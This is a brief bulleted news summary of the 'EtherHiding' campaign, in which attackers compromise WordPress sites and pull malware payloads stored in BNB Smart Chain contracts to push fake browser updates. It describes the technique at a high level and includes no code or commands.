– Cybercriminals have found a new method to spread malware by manipulating BNB Smart Chain (BSC) smart contracts.
– The attack, known as “EtherHiding”, involves compromising WordPress websites and injecting code that retrieves partial payloads from the blockchain contracts.
– Attackers hide the payloads in Binance smart contracts, using them as anonymous free hosting platforms.
– The hackers can update the code and change the attack methods at will.
– Recent attacks have come in the form of fake browser updates, where victims are prompted to update their browsers using a fake landing page and link.
– The payload contains JavaScript that fetches additional code from the attacker’s domains, leading to full site defacement with fake browser update notices that distribute malware.
– This approach allows threat actors to modify the attack chain by swapping out malicious code with each new blockchain transaction, making it challenging to mitigate.
– Once the infected smart contracts are deployed, Binance can only rely on its developer community to flag malicious code.
– Website owners using WordPress need to be extra vigilant with their security practices.
– Web3 and blockchain bring new possibilities for malicious campaigns to operate unchecked, requiring adaptive defenses to counter these emerging threats.
Hackers create novel way to hide malicious code in blockchains
